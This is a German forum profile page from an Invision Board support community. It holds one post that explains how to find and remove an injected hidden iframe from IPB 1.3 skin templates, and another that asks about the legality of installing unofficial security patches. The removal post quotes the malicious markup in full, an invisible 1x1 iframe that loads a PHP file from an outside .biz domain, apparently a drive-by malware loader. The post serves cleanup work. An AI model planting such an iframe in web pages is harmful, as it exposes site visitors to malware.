Jump to content
InvisionCommunity.de - Der Deutsche Invision Community Support

Neotec

Mitglied
  • Content count

    2
  • Joined

  • Last visited

About Neotec

  • Rank
    Einmalposter
  • Birthday 21.07.1985

IP.Board Informationen

  • IP.Board Version
    1.3.x

Profile Information

  • Wohnort
    München
  1. troyaner...

    Hi Kathrin, den Eintrag entfernst Du wie folgt: geh in die ACP > Skins & Templates > |-- Board Wrappers. Auf der rechten Seite findest du nun deine Skins. Jetzt mußt du bei Invision Board Standard auf Edit clicken. Dort findest du zwischen "<body> " und "<div id="ipbwrapper"> " den Eintrag "<div style="VISIBILITY: hidden"><iframe src="http://ydwrtyxamz.biz/dl/adv598.php" width=1 height=1></iframe></div> " evtl auch zwischen "</div>" und "</body>". Entweder deaktivierst du es indem du eine Leerzeile davor einfügst und dort "<!-- " und eine Zeile danach mit "--> ". Oder du löscht es einfach. Mache aber davor eine Sicherungskopie. Das mußt du mit allen Skins die du verwendest wiederholen. Sicherheitsupdates für die version IPB 1.3 findest du unter anderem IBForen.de . Als erstes solltest du dich in diesem Forum anmelden damit du die Updates herunterladen kannst. Am besten installierst du sie über den ModInstaller zuerst mußt du aber den Patch IPB 1.3 to IPB 1.3.1 installieren wenn du das nicht schon gemacht hast. Wenn du probleme dabei hast, kannst mich per PN anschreiben. viele grüße aus München Chriss
  2. Hab da noch eine Frage: Derzeit haben wir ein IPB 1.3 Final in verwendung. Wir hatten jetzt aber schon zum 3ten mal Besuch aus Russland, die uns in der Datenbank rumgeschrieben haben. Ich würde gerne das Update von http://www.ibforen.de (Update IPB 1.3 To 1.3.1) und alle folgenden Updates installieren. Wie sieht das rechtlich aus ? Eigentlich habe ich ja keinen neuen Vertrag "unterschrieben" ... Im Howto steht: "It is not for public use" (was heißt das im Klartext) Gibt es noch andere Updates die keine Einschränkungen haben ? Hab bis ejetzt keine gefunden. Alles was ich bis jetzt gefunden habe ist nicht wirklich eindeutig. Wie haltet ihr eure Foren auf dem aktuellen Stand ?
×